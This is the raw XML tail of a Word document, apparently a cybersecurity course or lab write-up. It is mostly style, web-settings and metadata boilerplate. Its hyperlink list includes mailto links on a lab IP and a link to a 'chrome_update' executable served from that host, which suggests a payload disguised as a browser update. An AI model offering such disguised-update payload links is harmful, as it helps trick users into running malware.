    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00201A21"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003725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5183">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="66155687">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="84351935">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="113333150">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="225773250">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="255334294">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="298725559">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="323627271">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="342245319">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="430781077">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="436802452">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="446391954">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="509413221">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="633870619">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="921795728">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="962350198">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="978268902">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1123891222">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1249465896">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1307204444">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1323658101">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1382747297">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1401176623">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1426414117">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1454519065">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1472863769">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1481920777">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1493372993">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1542010383">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1548449301">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1565290438">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1645311461">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1655986748">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1667316412">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1814713138">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1849327333">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1911769533">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1930655687">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1960603974">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1964994371">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2005277599">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2045403283">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2062318003">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21434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i@10.10.10.10" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.johnbryce.co.il" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:joe@10.10.10.10" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.10.10:1212/chrome_update.ex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10.10.10.10/multi" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:admin@10.10.10.1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CFF0-FA6E-4519-BE82-00ECC628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24</Pages>
  <Words>6490</Words>
  <Characters>36997</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>308</Lines>
  <Paragraphs>8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C זסב</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>SXC זסב</cp:lastModifiedBy>
  <cp:revision>119</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-06T11:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-18T10:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>